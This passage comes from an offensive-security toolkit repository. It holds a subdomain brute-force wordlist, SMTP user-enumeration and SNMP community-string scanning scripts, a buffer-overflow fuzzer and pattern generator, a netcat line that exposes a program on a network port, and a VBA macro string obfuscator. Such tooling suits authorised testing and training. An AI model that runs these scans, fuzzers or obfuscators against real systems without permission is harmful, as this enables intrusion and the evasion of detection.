fwsm1 676 | g 677 | ga 678 | galeria 679 | galerias 680 | galleries 681 | gallery 682 | games 683 | gamma 684 | gandalf 685 | gate 686 | gatekeeper 687 | gateway 688 | gauss 689 | gd 690 | ge 691 | gemini 692 | general 693 | george 694 | georgia 695 | germany 696 | gf 697 | gg 698 | gh 699 | gi 700 | gl 701 | glendale 702 | gm 703 | gmail 704 | gn 705 | go 706 | gold 707 | goldmine 708 | golf 709 | gopher 710 | gp 711 | gq 712 | gr 713 | green 714 | group 715 | groups 716 | groupwise 717 | gs 718 | gsx 719 | gt 720 | gu 721 | guest 722 | gw 723 | gw1 724 | gy 725 | h 726 | hal 727 | halflife 728 | hawaii 729 | hello 730 | help 731 | helpdesk 732 | helponline 733 | henry 734 | hermes 735 | hi 736 | hidden 737 | hk 738 | hm 739 | hn 740 | hobbes 741 | hollywood 742 | home 743 | homebase 744 | homer 745 | honeypot 746 | honolulu 747 | host 748 | host1 749 | host3 750 | host4 751 | host5 752 | hotel 753 | hotjobs 754 | houstin 755 | houston 756 | howto 757 | hp 758 | hpov 759 | hr 760 | ht 761 | http 762 | https 763 | hu 764 | hub 765 | humanresources 766 | i 767 | ia 768 | ias 769 | ibm 770 | ibmdb 771 | id 772 | ida 773 | idaho 774 | ids 775 | ie 776 | iis 777 | il 778 | illinois 779 | im 780 | images 781 | imail 782 | imap 783 | imap4 784 | img 785 | img0 786 | img01 787 | img02 788 | in 789 | inbound 790 | inc 791 | include 792 | incoming 793 | india 794 | indiana 795 | indianapolis 796 | info 797 | informix 798 | inside 799 | install 800 | int 801 | intern 802 | internal 803 | international 804 | internet 805 | intl 806 | intranet 807 | invalid 808 | investor 809 | investors 810 | io 811 | iota 812 | iowa 813 | iplanet 814 | ipmonitor 815 | ipsec 816 | ipsec-gw 817 | ipv6 818 | ipv6.teredo 819 | iq 820 | ir 821 | irc 822 | ircd 823 | ircserver 824 | ireland 825 | iris 826 | irvine 827 | irving 828 | is 829 | isa 830 | isaserv 831 | isaserver 832 | ism 833 | israel 834 | isync 835 | it 836 | italy 837 | ix 838 | j 839 | japan 840 | java 841 | je 842 | jedi 843 | jm 
844 | jo 845 | jobs 846 | john 847 | jp 848 | jrun 849 | juegos 850 | juliet 851 | juliette 852 | juniper 853 | k 854 | kansas 855 | kansascity 856 | kappa 857 | kb 858 | ke 859 | kentucky 860 | kerberos 861 | keynote 862 | kg 863 | kh 864 | ki 865 | kilo 866 | king 867 | km 868 | kn 869 | knowledgebase 870 | knoxville 871 | koe 872 | korea 873 | kp 874 | kr 875 | ks 876 | kw 877 | ky 878 | kz 879 | l 880 | la 881 | lab 882 | laboratory 883 | labs 884 | lambda 885 | lan 886 | laptop 887 | laserjet 888 | lasvegas 889 | launch 890 | lb 891 | lc 892 | ldap 893 | legal 894 | leo 895 | li 896 | lib 897 | library 898 | lima 899 | lincoln 900 | link 901 | linux 902 | linux0 903 | linux01 904 | linux02 905 | linux1 906 | linux2 907 | lista 908 | lists 909 | listserv 910 | listserver 911 | live 912 | lk 913 | load 914 | loadbalancer 915 | local 916 | localhost 917 | log 918 | log0 919 | log01 920 | log02 921 | log1 922 | log2 923 | logfile 924 | logfiles 925 | logger 926 | logging 927 | loghost 928 | login 929 | logs 930 | london 931 | longbeach 932 | losangeles 933 | lotus 934 | louisiana 935 | lr 936 | ls 937 | lt 938 | lu 939 | luke 940 | lv 941 | ly 942 | lyris 943 | m 944 | ma 945 | mac 946 | mac1 947 | mac10 948 | mac11 949 | mac2 950 | mac3 951 | mac4 952 | mac5 953 | mach 954 | macintosh 955 | madrid 956 | mail 957 | mail2 958 | mailer 959 | mailgate 960 | mailhost 961 | mailing 962 | maillist 963 | maillists 964 | mailroom 965 | mailserv 966 | mailsite 967 | mailsrv 968 | main 969 | maine 970 | maint 971 | mall 972 | manage 973 | management 974 | manager 975 | manufacturing 976 | map 977 | mapas 978 | maps 979 | marketing 980 | marketplace 981 | mars 982 | marvin 983 | mary 984 | maryland 985 | massachusetts 986 | master 987 | max 988 | mc 989 | mci 990 | md 991 | mdaemon 992 | me 993 | media 994 | member 995 | members 996 | memphis 997 | mercury 998 | merlin 999 | messages 1000 | messenger 1001 | mg 1002 | mgmt 1003 | mh 1004 | mi 1005 | miami 1006 | michigan 1007 
| mickey 1008 | midwest 1009 | mike 1010 | milwaukee 1011 | minneapolis 1012 | minnesota 1013 | mirror 1014 | mis 1015 | mississippi 1016 | missouri 1017 | mk 1018 | ml 1019 | mm 1020 | mn 1021 | mngt 1022 | mo 1023 | mobile 1024 | mobilemail 1025 | mom 1026 | monitor 1027 | monitoring 1028 | montana 1029 | moon 1030 | moscow 1031 | movies 1032 | mozart 1033 | mp 1034 | mp3 1035 | mpeg 1036 | mpg 1037 | mq 1038 | mr 1039 | mrtg 1040 | ms 1041 | ms-exchange 1042 | ms-sql 1043 | msexchange 1044 | mssql 1045 | mssql0 1046 | mssql01 1047 | mssql1 1048 | mt 1049 | mta 1050 | mtu 1051 | mu 1052 | multimedia 1053 | music 1054 | mv 1055 | mw 1056 | mx 1057 | my 1058 | mysql 1059 | mysql0 1060 | mysql01 1061 | mysql1 1062 | mz 1063 | n 1064 | na 1065 | name 1066 | names 1067 | nameserv 1068 | nameserver 1069 | nas 1070 | nashville 1071 | nat 1072 | nc 1073 | nd 1074 | nds 1075 | ne 1076 | nebraska 1077 | neptune 1078 | net 1079 | netapp 1080 | netdata 1081 | netgear 1082 | netmeeting 1083 | netscaler 1084 | netscreen 1085 | netstats 1086 | network 1087 | nevada 1088 | new 1089 | newhampshire 1090 | newjersey 1091 | newmexico 1092 | neworleans 1093 | news 1094 | newsfeed 1095 | newsfeeds 1096 | newsgroups 1097 | newton 1098 | newyork 1099 | newzealand 1100 | nf 1101 | ng 1102 | nh 1103 | ni 1104 | nigeria 1105 | nj 1106 | nl 1107 | nm 1108 | nms 1109 | nntp 1110 | no 1111 | node 1112 | nokia 1113 | nombres 1114 | nora 1115 | north 1116 | northcarolina 1117 | northdakota 1118 | northeast 1119 | northwest 1120 | noticias 1121 | novell 1122 | november 1123 | np 1124 | nr 1125 | ns 1126 | ns- 1127 | ns0 1128 | ns01 1129 | ns02 1130 | ns1 1131 | ns2 1132 | ns3 1133 | ns4 1134 | ns5 1135 | nt 1136 | nt4 1137 | nt40 1138 | ntmail 1139 | ntp 1140 | ntserver 1141 | nu 1142 | null 1143 | nv 1144 | ny 1145 | nz 1146 | o 1147 | oakland 1148 | ocean 1149 | odin 1150 | office 1151 | offices 1152 | oh 1153 | ohio 1154 | ok 1155 | oklahoma 1156 | oklahomacity 1157 | old 1158 | om 1159 | 
omaha 1160 | omega 1161 | omicron 1162 | online 1163 | ontario 1164 | open 1165 | openbsd 1166 | openview 1167 | operations 1168 | ops 1169 | ops0 1170 | ops01 1171 | ops02 1172 | ops1 1173 | ops2 1174 | opsware 1175 | or 1176 | oracle 1177 | orange 1178 | order 1179 | orders 1180 | oregon 1181 | orion 1182 | orlando 1183 | oscar 1184 | out 1185 | outbound 1186 | outgoing 1187 | outlook 1188 | outside 1189 | ov 1190 | owa 1191 | owa01 1192 | owa02 1193 | owa1 1194 | owa2 1195 | ows 1196 | oxnard 1197 | p 1198 | pa 1199 | page 1200 | pager 1201 | pages 1202 | paginas 1203 | papa 1204 | paris 1205 | parners 1206 | partner 1207 | partners 1208 | patch 1209 | patches 1210 | paul 1211 | payroll 1212 | pbx 1213 | pc 1214 | pc01 1215 | pc1 1216 | pc10 1217 | pc101 1218 | pc11 1219 | pc12 1220 | pc13 1221 | pc14 1222 | pc15 1223 | pc16 1224 | pc17 1225 | pc18 1226 | pc19 1227 | pc2 1228 | pc20 1229 | pc21 1230 | pc22 1231 | pc23 1232 | pc24 1233 | pc25 1234 | pc26 1235 | pc27 1236 | pc28 1237 | pc29 1238 | pc3 1239 | pc30 1240 | pc31 1241 | pc32 1242 | pc33 1243 | pc34 1244 | pc35 1245 | pc36 1246 | pc37 1247 | pc38 1248 | pc39 1249 | pc4 1250 | pc40 1251 | pc41 1252 | pc42 1253 | pc43 1254 | pc44 1255 | pc45 1256 | pc46 1257 | pc47 1258 | pc48 1259 | pc49 1260 | pc5 1261 | pc50 1262 | pc51 1263 | pc52 1264 | pc53 1265 | pc54 1266 | pc55 1267 | pc56 1268 | pc57 1269 | pc58 1270 | pc59 1271 | pc6 1272 | pc60 1273 | pc7 1274 | pc8 1275 | pc9 1276 | pcmail 1277 | pda 1278 | pdc 1279 | pe 1280 | pegasus 1281 | pennsylvania 1282 | peoplesoft 1283 | personal 1284 | pf 1285 | pg 1286 | pgp 1287 | ph 1288 | phi 1289 | philadelphia 1290 | phoenix 1291 | phoeniz 1292 | phone 1293 | phones 1294 | photos 1295 | pi 1296 | pics 1297 | pictures 1298 | pink 1299 | pipex-gw 1300 | pittsburgh 1301 | pix 1302 | pk 1303 | pki 1304 | pl 1305 | plano 1306 | platinum 1307 | pluto 1308 | pm 1309 | pm1 1310 | pn 1311 | po 1312 | policy 1313 | polls 1314 | pop 1315 | pop3 1316 | portal 1317 | 
portals 1318 | portfolio 1319 | portland 1320 | post 1321 | postales 1322 | postoffice 1323 | ppp1 1324 | ppp10 1325 | ppp11 1326 | ppp12 1327 | ppp13 1328 | ppp14 1329 | ppp15 1330 | ppp16 1331 | ppp17 1332 | ppp18 1333 | ppp19 1334 | ppp2 1335 | ppp20 1336 | ppp21 1337 | ppp3 1338 | ppp4 1339 | ppp5 1340 | ppp6 1341 | ppp7 1342 | ppp8 1343 | ppp9 1344 | pptp 1345 | pr 1346 | prensa 1347 | press 1348 | printer 1349 | printserv 1350 | printserver 1351 | priv 1352 | privacy 1353 | private 1354 | problemtracker 1355 | products 1356 | profiles 1357 | project 1358 | projects 1359 | promo 1360 | proxy 1361 | prueba 1362 | pruebas 1363 | ps 1364 | psi 1365 | pss 1366 | pt 1367 | pub 1368 | public 1369 | pubs 1370 | purple 1371 | pw 1372 | py 1373 | q 1374 | qa 1375 | qmail 1376 | qotd 1377 | quake 1378 | quebec 1379 | queen 1380 | quotes 1381 | r 1382 | r01 1383 | r02 1384 | r1 1385 | r2 1386 | ra 1387 | radio 1388 | radius 1389 | rapidsite 1390 | raptor 1391 | ras 1392 | rc 1393 | rcs 1394 | rd 1395 | re 1396 | read 1397 | realserver 1398 | recruiting 1399 | red 1400 | redhat 1401 | ref 1402 | reference 1403 | reg 1404 | register 1405 | registro 1406 | registry 1407 | regs 1408 | relay 1409 | rem 1410 | remote 1411 | remstats 1412 | reports 1413 | research 1414 | reseller 1415 | reserved 1416 | resumenes 1417 | rho 1418 | rhodeisland 1419 | ri 1420 | ris 1421 | rmi 1422 | ro 1423 | robert 1424 | romeo 1425 | root 1426 | rose 1427 | route 1428 | router 1429 | router1 1430 | rs 1431 | rss 1432 | rtelnet 1433 | rtr 1434 | rtr01 1435 | rtr1 1436 | ru 1437 | rune 1438 | rw 1439 | rwhois 1440 | s 1441 | s1 1442 | s2 1443 | sa 1444 | sac 1445 | sacramento 1446 | sadmin 1447 | safe 1448 | sales 1449 | saltlake 1450 | sam 1451 | san 1452 | sanantonio 1453 | sandiego 1454 | sanfrancisco 1455 | sanjose 1456 | saskatchewan 1457 | saturn 1458 | sb 1459 | sbs 1460 | sc 1461 | scanner 1462 | schedules 1463 | scotland 1464 | scotty 1465 | sd 1466 | se 1467 | search 1468 | seattle 1469 
| sec 1470 | secret 1471 | secure 1472 | secured 1473 | securid 1474 | security 1475 | sendmail 1476 | seri 1477 | serv 1478 | serv2 1479 | server 1480 | server1 1481 | servers 1482 | service 1483 | services 1484 | servicio 1485 | servidor 1486 | setup 1487 | sg 1488 | sh 1489 | shared 1490 | sharepoint 1491 | shareware 1492 | shipping 1493 | shop 1494 | shoppers 1495 | shopping 1496 | si 1497 | siebel 1498 | sierra 1499 | sigma 1500 | signin 1501 | signup 1502 | silver 1503 | sim 1504 | sirius 1505 | site 1506 | sj 1507 | sk 1508 | skywalker 1509 | sl 1510 | slackware 1511 | slmail 1512 | sm 1513 | smc 1514 | sms 1515 | smtp 1516 | smtphost 1517 | sn 1518 | sniffer 1519 | snmp 1520 | snmpd 1521 | snoopy 1522 | snort 1523 | so 1524 | soap 1525 | socal 1526 | software 1527 | sol 1528 | solaris 1529 | solutions 1530 | soporte 1531 | source 1532 | sourcecode 1533 | sourcesafe 1534 | south 1535 | southcarolina 1536 | southdakota 1537 | southeast 1538 | southwest 1539 | spain 1540 | spam 1541 | spider 1542 | spiderman 1543 | splunk 1544 | spock 1545 | spokane 1546 | springfield 1547 | sprint 1548 | sqa 1549 | sql 1550 | sql0 1551 | sql01 1552 | sql1 1553 | sql7 1554 | sqlserver 1555 | squid 1556 | sr 1557 | ss 1558 | ssh 1559 | ssl 1560 | ssl0 1561 | ssl01 1562 | ssl1 1563 | st 1564 | staff 1565 | stage 1566 | staging 1567 | start 1568 | stat 1569 | static 1570 | statistics 1571 | stats 1572 | stlouis 1573 | stock 1574 | storage 1575 | store 1576 | storefront 1577 | streaming 1578 | stronghold 1579 | strongmail 1580 | studio 1581 | submit 1582 | subversion 1583 | sun 1584 | sun0 1585 | sun01 1586 | sun02 1587 | sun1 1588 | sun2 1589 | superman 1590 | supplier 1591 | suppliers 1592 | support 1593 | sv 1594 | sw 1595 | sw0 1596 | sw01 1597 | sw1 1598 | sweden 1599 | switch 1600 | switzerland 1601 | sy 1602 | sybase 1603 | sydney 1604 | sysadmin 1605 | sysback 1606 | syslog 1607 | syslogs 1608 | system 1609 | sz 1610 | t 1611 | tacoma 1612 | taiwan 1613 | talk 1614 | tampa 
1615 | tango 1616 | tau 1617 | tc 1618 | tcl 1619 | td 1620 | team 1621 | tech 1622 | technology 1623 | techsupport 1624 | telephone 1625 | telephony 1626 | telnet 1627 | temp 1628 | tennessee 1629 | terminal 1630 | terminalserver 1631 | termserv 1632 | test 1633 | test2k 1634 | testajax 1635 | testasp 1636 | testaspnet 1637 | testbed 1638 | testcf 1639 | testing 1640 | testjsp 1641 | testlab 1642 | testlinux 1643 | testphp 1644 | testserver 1645 | testsite 1646 | testsql 1647 | testxp 1648 | texas 1649 | tf 1650 | tftp 1651 | tg 1652 | th 1653 | thailand 1654 | theta 1655 | thor 1656 | tienda 1657 | tiger 1658 | time 1659 | titan 1660 | tivoli 1661 | tj 1662 | tk 1663 | tm 1664 | tn 1665 | to 1666 | tokyo 1667 | toledo 1668 | tom 1669 | tool 1670 | tools 1671 | toplayer 1672 | toronto 1673 | tour 1674 | tp 1675 | tr 1676 | tracker 1677 | train 1678 | training 1679 | transfers 1680 | trinidad 1681 | trinity 1682 | ts 1683 | ts1 1684 | tt 1685 | tucson 1686 | tulsa 1687 | tunnel 1688 | tv 1689 | tw 1690 | tx 1691 | tz 1692 | u 1693 | ua 1694 | uddi 1695 | ug 1696 | uk 1697 | um 1698 | uniform 1699 | union 1700 | unitedkingdom 1701 | unitedstates 1702 | unix 1703 | unixware 1704 | update 1705 | updates 1706 | upload 1707 | ups 1708 | upsilon 1709 | uranus 1710 | urchin 1711 | us 1712 | usa 1713 | usenet 1714 | user 1715 | users 1716 | ut 1717 | utah 1718 | utilities 1719 | uy 1720 | uz 1721 | v 1722 | v6 1723 | va 1724 | vader 1725 | vantive 1726 | vault 1727 | vc 1728 | ve 1729 | vega 1730 | vegas 1731 | vend 1732 | vendors 1733 | venus 1734 | vermont 1735 | vg 1736 | vi 1737 | victor 1738 | video 1739 | videos 1740 | viking 1741 | violet 1742 | vip 1743 | virginia 1744 | vista 1745 | vm 1746 | vmserver 1747 | vmware 1748 | vn 1749 | vnc 1750 | voice 1751 | voicemail 1752 | voip 1753 | voyager 1754 | vpn 1755 | vpn0 1756 | vpn01 1757 | vpn02 1758 | vpn1 1759 | vpn2 1760 | vt 1761 | vu 1762 | w 1763 | w1 1764 | w2 1765 | w3 1766 | wa 1767 | wais 1768 | wallet 1769 | 
wam 1770 | wan 1771 | wap 1772 | warehouse 1773 | washington 1774 | wc3 1775 | web 1776 | webaccess 1777 | webadmin 1778 | webalizer 1779 | webboard 1780 | webcache 1781 | webcam 1782 | webcast 1783 | webdev 1784 | webdocs 1785 | webfarm 1786 | webhelp 1787 | weblib 1788 | weblogic 1789 | webmail 1790 | webmaster 1791 | webproxy 1792 | webring 1793 | webs 1794 | webserv 1795 | webserver 1796 | webservices 1797 | website 1798 | websites 1799 | websphere 1800 | websrv 1801 | websrvr 1802 | webstats 1803 | webstore 1804 | websvr 1805 | webtrends 1806 | welcome 1807 | west 1808 | westvirginia 1809 | wf 1810 | whiskey 1811 | white 1812 | whois 1813 | wi 1814 | wichita 1815 | wiki 1816 | wililiam 1817 | win 1818 | win01 1819 | win02 1820 | win1 1821 | win2 1822 | win2000 1823 | win2003 1824 | win2k 1825 | win2k3 1826 | windows 1827 | windows01 1828 | windows02 1829 | windows1 1830 | windows2 1831 | windows2000 1832 | windows2003 1833 | windowsxp 1834 | wingate 1835 | winnt 1836 | winproxy 1837 | wins 1838 | winserve 1839 | winxp 1840 | wire 1841 | wireless 1842 | wisconsin 1843 | wlan 1844 | wordpress 1845 | work 1846 | world 1847 | wpad 1848 | write 1849 | ws 1850 | ws1 1851 | ws10 1852 | ws11 1853 | ws12 1854 | ws13 1855 | ws2 1856 | ws3 1857 | ws4 1858 | ws5 1859 | ws6 1860 | ws7 1861 | ws8 1862 | ws9 1863 | wusage 1864 | wv 1865 | ww 1866 | www 1867 | www- 1868 | www-01 1869 | www-02 1870 | www-1 1871 | www-2 1872 | www-int 1873 | www0 1874 | www01 1875 | www02 1876 | www1 1877 | www2 1878 | www3 1879 | wwwchat 1880 | wwwdev 1881 | wwwmail 1882 | wy 1883 | wyoming 1884 | x 1885 | x-ray 1886 | xi 1887 | xlogan 1888 | xmail 1889 | xml 1890 | xp 1891 | y 1892 | yankee 1893 | ye 1894 | yellow 1895 | young 1896 | yt 1897 | yu 1898 | z 1899 | z-log 1900 | za 1901 | zebra 1902 | zera 1903 | zeus 1904 | zlog 1905 | zm 1906 | zulu 1907 | zw 1908 | -------------------------------------------------------------------------------- /enumeration/smtp/vrfy_enum.py: 
-------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import socket 4 | import sys 5 | if len(sys.argv) != 3: 6 | print "Usage: %s " % sys.argv[0] 7 | sys.exit(1) 8 | 9 | # Create a socket 10 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 11 | # Connect to the Server 12 | connect=s.connect((sys.argv[1],25)) 13 | # Receive the banner 14 | banner=s.recv(1024) 15 | # print banner 16 | # VRFY a user 17 | s.send('VRFY ' + sys.argv[2] + '\r\n') 18 | result=s.recv(1024) 19 | if result == "502 Use HELO/EHLO first.": 20 | print "WARN: Server returned:\n%s" % result 21 | print "INFO: Sending HELO message" 22 | s.send ('HELO vrfytester' + '\r\n') 23 | result=s.recv(1024) 24 | print "INFO: Retrying VRFY request" 25 | s.send('VRFY ' + sys.argv[2] + '\r\n') 26 | result=s.recv(1024) 27 | if result == "502 VRFY disallowed.": 28 | print "ERR: VRFY disallowed on server!" 29 | s.close() 30 | sys.exit(2) 31 | else: 32 | print result 33 | elif result.split(' ', 1)[0] == "550": 34 | print "WARN: Username unknown, server returned:\n%s" % result 35 | sys.exit(2) 36 | else: 37 | print result 38 | 39 | # Close the socket 40 | s.close() 41 | sys.exit(0) 42 | -------------------------------------------------------------------------------- /enumeration/smtp/vrfy_wrapper.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | for host in $(cat smtp_hosts); do 4 | echo "Usernames VRFYed for $host" 5 | for name in $(cat namelist.txt); do 6 | ./vrfy_enum.py $host $name |grep 250; 7 | done 8 | done 9 | -------------------------------------------------------------------------------- /enumeration/snmp/snmp_checker.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [ -z "$1" ]; then 3 | echo "[*] Automagically enumerates a given network range for hosts and tries a given set of community strings" 4 | echo "[*] Dumps the output 
to hosts//snmp_check_info" 5 | echo "[*] Usage : $0 [/path/to/file/with/snmp/strings]" 6 | exit 1 7 | fi 8 | 9 | onesixtyone -c $community_file -i $scan_range_file | grep 192. |cut -d " " -f 1| tee snmp_hosts 10 | # snmpcheck -c public -t 192.168.15.203 11 | for string in $(cat community_file); do 12 | for host in $(cat snmp_hosts); do 13 | snmpcheck -c $string -t $host |tee hosts/$host/snmp_check_info; 14 | done 15 | done 16 | -------------------------------------------------------------------------------- /enumeration/ssl/ssl_cert_details.py: -------------------------------------------------------------------------------- 1 | import argparse, ssl, sys, OpenSSL 2 | 3 | desc = "Grabs SSL certificate details from a running SSL service" 4 | parser = argparse.ArgumentParser(prog='get_ssl_cert', usage=sys.argv[0] + ' [options]', description=desc) 5 | parser.add_argument('-i', "--hostname", type=str, help="Hostname/ip of SSL service to query", required=True) 6 | parser.add_argument('-p', "--port", type=int, help="Port of TCP/IP SSL service", required=False, default=443) 7 | args=parser.parse_args() 8 | 9 | # Formatting prep 10 | fldmap = ( 11 | 'Attribute', 's', 12 | 'Value', 's',) 13 | 14 | head = '\t\t\t'.join(fldmap[0:len(fldmap):2]) 15 | fmt = '\t\t\t'.join(['{' + '{0}:{1}'.format(col,fmt) + '}' \ 16 | for col, fmt in zip( \ 17 | fldmap[0:len(fldmap):2], \ 18 | fldmap[1:len(fldmap):2])]) 19 | 20 | # Grab the certificate 21 | cert = ssl.get_server_certificate((args.hostname, args.port)) 22 | x509 = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, cert) 23 | 24 | # Convert the class 25 | subject = x509.get_subject() 26 | issuer = x509.get_issuer() 27 | 28 | # Output formatted details 29 | print("Certificate details for: " + args.hostname + '\n') 30 | print head 31 | print "-------------------------------------------" 32 | print fmt.format(Attribute='Common Name:', Value=subject.commonName) 33 | print fmt.format(Attribute='Subject Organization:', 
Value=subject.organizationName) 34 | print fmt.format(Attribute='Subject Organizational Unit:', Value=subject.organizationalUnitName) 35 | print fmt.format(Attribute='Issuer Organization:',Value=issuer.organizationName) 36 | print fmt.format(Attribute='Issuer CN:', Value=issuer.commonName) 37 | -------------------------------------------------------------------------------- /exploit-development/auxillary/host_pwnable.sh: -------------------------------------------------------------------------------- 1 | # Used to host a pwnable locally when practicing with pwnables 2 | # Und3rf10w 3 | 4 | if [ "$#" -ne 2 ]; then 5 | echo "Usage: $0 " 6 | exit 7 | fi 8 | 9 | nc -l -p $1 -e $2 10 | -------------------------------------------------------------------------------- /exploit-development/auxillary/pattern.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | # Taken from: https://github.com/blackr8t/pwn-tools/blob/master/pattern.py 3 | # Modified by Und3rf10w 4 | 5 | 6 | import sys 7 | import argparse 8 | from string import uppercase, lowercase, digits 9 | 10 | MAX_PATTERN_LENGTH = 20280 11 | 12 | def pattern_gen(length): 13 | """ 14 | Generate a pattern of a given length up to a maximum 15 | of 20280 - after this the pattern would repeat 16 | """ 17 | if length >= MAX_PATTERN_LENGTH: 18 | print 'ERROR: Pattern length exceeds maximum of %d' % MAX_PATTERN_LENGTH 19 | sys.exit(1) 20 | 21 | pattern = '' 22 | for upper in uppercase: 23 | for lower in lowercase: 24 | for digit in digits: 25 | if len(pattern) < length: 26 | pattern += upper+lower+digit 27 | else: 28 | out = pattern[:length] 29 | print out 30 | return 31 | 32 | def pattern_search(search_pattern): 33 | """ 34 | Search for search_pattern in pattern. Convert from hex if given as such. 
35 | """ 36 | needle = search_pattern 37 | if len(needle) == 10 or len(needle) == 8: 38 | try: 39 | # (EIP = 0x41326641) Value can be given as either 0x41326641 or 41326641 40 | if needle.startswith('0x'): 41 | # Strip off '0x', convert to ASCII and reverse 42 | needle = needle[2:].decode('hex') 43 | needle = needle[::-1] 44 | else: 45 | needle = needle.decode('hex') 46 | needle = needle[::-1] 47 | except TypeError as e: 48 | print 'Unable to convert hex input:', e 49 | sys.exit(1) 50 | 51 | haystack = '' 52 | for upper in uppercase: 53 | for lower in lowercase: 54 | for digit in digits: 55 | haystack += upper+lower+digit 56 | found_at = haystack.find(needle) 57 | if found_at > -1: 58 | print('Pattern %s first occurrence at position %d in pattern.' % 59 | (search_pattern, found_at)) 60 | return 61 | 62 | print ('Couldn\'t find %s (%s) anywhere in the pattern.' % 63 | (search_pattern, needle)) 64 | 65 | 66 | if __name__ == '__main__': 67 | parser = argparse.ArgumentParser(prog=str(sys.argv[0]), usage='%(prog)s [options]', description='Pattern Generator and Searcher') 68 | 69 | parser.add_argument('-s', help='Search for given pattern or address (0x41326641 || 41326641 || A2fA', dest='search_pattern', required=False) 70 | parser.add_argument('-g', help='Generate pattern of length', dest='length', required=False) 71 | 72 | args = parser.parse_args() 73 | try: 74 | if args.search_pattern and args.length: 75 | print "ERROR: both -g and -s given" 76 | elif args.search_pattern: 77 | pattern_search(args.search_pattern) 78 | else: 79 | pattern_gen(int(args.length)) 80 | except: 81 | parser.print_help() 82 | sys.exit(0) -------------------------------------------------------------------------------- /exploit-development/auxillary/shellcode_to_hex.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | originalfile=$1 4 | outputfile=$2 5 | 6 | if [ "$#" -lt 1 ]; then 7 | echo -e "Converts a binary to raw hexcode\n$0: 
[/path/to/output/file]" 8 | exit 0 9 | fi 10 | 11 | if [[ -z "$outputfile" ]]; then 12 | hexdump -C $originalfile | grep -v $(hexdump -C $originalfile | tail -n 1) | cut -d " " -f3-19 | sed 's/ //g' | tr -d '\n' 13 | else 14 | hexdump -C $originalfile | grep -v $(hexdump -C $originalfile | tail -n 1) | cut -d " " -f3-19 | sed 's/ //g' | tr -d '\n' |tee $outputfile 15 | fi 16 | 17 | echo -e "\n" 18 | 19 | -------------------------------------------------------------------------------- /exploit-development/fuzzers/network_service_fuzzer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Simple fuzz against a target 3 | import socket 4 | from sys import exit,argv 5 | 6 | if len(argv) < 2: 7 | print "Performs a simple fuzz against a target" 8 | print "Usage: %s " % str(argv[0]) 9 | exit(1) 10 | 11 | #Create an arry of buffers, from 10 to 2000, with increments of 20. 12 | buffer=["A"] 13 | counter=100 14 | while len(buffer) <= 30: 15 | buffer.append("A"*counter) 16 | counter=counter+200 17 | 18 | for string in buffer: 19 | print "Fuzzing %s:%s with %s bytes" % (str(argv[1]),int(argv[2]),len(string)) 20 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 21 | connect=s.connect((str(argv[1]),int(argv[2]))) 22 | # This next part depends on whatever the RFC is for what you're trying to 23 | # exploit. Up to you to put the 'string' in the right place. Be sure to 24 | # receive bytes after sending anything. 25 | s.recv(1024) # Grab the banner, do not remove 26 | s.send(string + "\r\n") # Sends your evil buffer as 'string' 27 | s.send('QUIT\r\n') # Replace 'QUIT' with whatever ends your session 28 | s.close() 29 | -------------------------------------------------------------------------------- /exploit-development/obfuscators/vba_str_to_chr/chr_table.txt: -------------------------------------------------------------------------------- 1 | Chr(33) ! 
2 | Chr(34) " 3 | Chr(35) # 4 | Chr(36) $ 5 | Chr(37) % 6 | Chr(38) & 7 | Chr(39) ' 8 | Chr(40) ( 9 | Chr(41) ) 10 | Chr(42) * 11 | Chr(43) + 12 | Chr(44) , 13 | Chr(45) - 14 | Chr(46) . 15 | Chr(47) / 16 | Chr(48) 0 17 | Chr(49) 1 18 | Chr(50) 2 19 | Chr(51) 3 20 | Chr(52) 4 21 | Chr(53) 5 22 | Chr(54) 6 23 | Chr(55) 7 24 | Chr(56) 8 25 | Chr(57) 9 26 | Chr(58) : 27 | Chr(59) ; 28 | Chr(60) < 29 | Chr(61) = 30 | Chr(62) > 31 | Chr(63) ? 32 | Chr(64) @ 33 | Chr(65) A 34 | Chr(66) B 35 | Chr(67) C 36 | Chr(68) D 37 | Chr(69) E 38 | Chr(70) F 39 | Chr(71) G 40 | Chr(72) H 41 | Chr(73) I 42 | Chr(74) J 43 | Chr(75) K 44 | Chr(76) L 45 | Chr(77) M 46 | Chr(78) N 47 | Chr(79) O 48 | Chr(80) P 49 | Chr(81) Q 50 | Chr(82) R 51 | Chr(83) S 52 | Chr(84) T 53 | Chr(85) U 54 | Chr(86) V 55 | Chr(87) W 56 | Chr(88) X 57 | Chr(89) Y 58 | Chr(90) Z 59 | Chr(91) [ 60 | Chr(92) \ 61 | Chr(93) ] 62 | Chr(94) ^ 63 | Chr(32) _ 64 | Chr(96) ` 65 | Chr(97) a 66 | Chr(98) b 67 | Chr(99) c 68 | Chr(100) d 69 | Chr(101) e 70 | Chr(102) f 71 | Chr(103) g 72 | Chr(104) h 73 | Chr(105) i 74 | Chr(106) j 75 | Chr(107) k 76 | Chr(108) l 77 | Chr(109) m 78 | Chr(110) n 79 | Chr(111) o 80 | Chr(112) p 81 | Chr(113) q 82 | Chr(114) r 83 | Chr(115) s 84 | Chr(116) t 85 | Chr(117) u 86 | Chr(118) v 87 | Chr(119) w 88 | Chr(120) x 89 | Chr(121) y 90 | Chr(122) z 91 | Chr(123) { 92 | Chr(124) | 93 | Chr(125) } 94 | Chr(126) ~ 95 | -------------------------------------------------------------------------------- /exploit-development/obfuscators/vba_str_to_chr/conv_str.sh: -------------------------------------------------------------------------------- 1 | # still some bugs that need to get worked out in this, but almost have it 2 | # Need to sort out space characters 3 | # Need to figure out why it's tacking on a '+' at the end 4 | # The space not being handled properly and the + being tacked on at the end are related. 
